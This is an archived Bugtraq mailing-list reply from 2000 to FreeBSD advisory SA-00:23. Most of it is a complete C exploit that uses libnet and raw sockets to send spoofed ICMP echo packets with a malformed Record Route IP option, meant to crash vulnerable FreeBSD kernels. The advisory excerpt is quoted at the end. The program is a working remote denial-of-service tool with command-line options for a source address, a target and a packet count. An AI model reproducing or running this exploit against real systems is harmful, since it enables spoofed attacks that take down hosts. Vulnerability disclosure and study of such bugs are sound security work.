[15485] in bugtraq
Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options
daemon@ATHENA.MIT.EDU (yeti)
Mon Jun 26 16:31:29 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <Pine.LNX.4.10.9901131941520.12717-100000@rast.lodz.pdi.net>
Date: Wed, 13 Jan 1999 19:50:08 +0100
Reply-To: yeti <y3t1@RAST.LODZ.PDI.NET>
From: yeti <y3t1@RAST.LODZ.PDI.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000622215052.D642E37BF12@hub.freebsd.org>
#include <stdio.h>
#include <libnet.h>
/* Remote denial-of-service in IP stack
simple exploit by y3t1
y3t1@rast.lodz.pdi.net
Gretzzz : rastlin,z33d,vanitas,DYZIU,Kuki,vx,zx,korie,kaneda,
d3cker&mroowka,jarv33s,funkySh,Shadow,tmoggie
all from :
#hwa.hax0r.news@efnet
#darnet@efnet
*/
int rand_n(u_long zakres)
{
return 1+(int) ((float)zakres*rand()/(RAND_MAX+1.0));
}
int main(int argc, char **argv)
{
char a;
int sock, c,pkt,ile;
struct hostent *host;
u_long src_ip, dst_ip;
u_char *buf;
u_char options[4];
int option_s = sizeof(options);
struct ipoption ipopt;
srand(time(NULL));
ile=100;
printf(" -= Remote denial-of-service in IP stack =- \n");
printf("\n");
printf(" by y3t1/team140\n");
printf(" y3t1@rast.lodz.pdi.net \n");
printf("\n");
if (argc < 4)
{
printf("%s -s src_addr -d dst_addr -p packets\n",argv[0]);
printf(" -s src_addr - source address \n");
printf(" -d dst_addr - dest address \n");
printf(" -p packets - how many packets send to dest (default 100)\n");
exit(1);
}
opterr=0;
while((a=getopt(argc,argv,"s:d:p:"))!=EOF)
{
switch(a) {
case 's': {
if ((host=gethostbyname(optarg))!=NULL)
bcopy(host->h_addr,&src_ip,host->h_length);
else src_ip=inet_addr(optarg);
break;
}
case 'd': {
if ((host=gethostbyname(optarg))!=NULL)
bcopy(host->h_addr,&dst_ip,host->h_length);
else dst_ip=inet_addr(optarg);
break;
}
case 'p': {
ile=atoi(optarg);
break;
}
}
}
bzero(options,option_s);
buf = malloc(IP_MAXPACKET);
if (!buf)
{
perror("malloc");
exit(-1);
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("socket");
exit(-1);
}
libnet_build_ip(LIBNET_ICMP_H ,0,242,0,48,IPPROTO_ICMP,src_ip,dst_ip,NULL,0,buf);
memcpy(ipopt.ipopt_list, options, option_s);
*(ipopt.ipopt_list) = IPOPT_RR;
*(ipopt.ipopt_list+1) = 3;
*(ipopt.ipopt_list+2) = 0xff;
*(ipopt.ipopt_list+3) = 0;
c = libnet_insert_ipo(&ipopt,option_s,buf);
if (c == -1)
{
printf("Error\n");
exit(1);
}
libnet_build_icmp_echo(ICMP_ECHO,0,242,31337,NULL,0,buf+LIBNET_IP_H+option_s);
if (libnet_do_checksum(buf,IPPROTO_ICMP,LIBNET_ICMP_ECHO_H)==-1)
{
printf("can't do checksum \n");
}
for (pkt=0;pkt<ile;pkt++)
{
buf[22]=rand_n(0xff);
c = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + option_s);
}
free(buf);
libnet_close_raw_sock(sock);
}
On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Topic: Remote denial-of-service in IP stack
>
> Category: core
> Module: kernel
>
> There are several bugs in the processing of IP options in the FreeBSD
> IP stack, which fail to correctly bounds-check arguments and contain
> other coding errors leading to the possibility of data corruption and
> a kernel panic upon reception of certain invalid IP packets.
>
